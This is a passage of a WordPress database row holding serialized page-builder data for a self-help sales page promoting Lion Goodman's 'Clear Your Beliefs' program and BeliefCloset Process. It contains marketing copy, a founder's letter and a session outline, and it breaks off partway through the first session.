(1544, 1983, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60552:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -60px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs 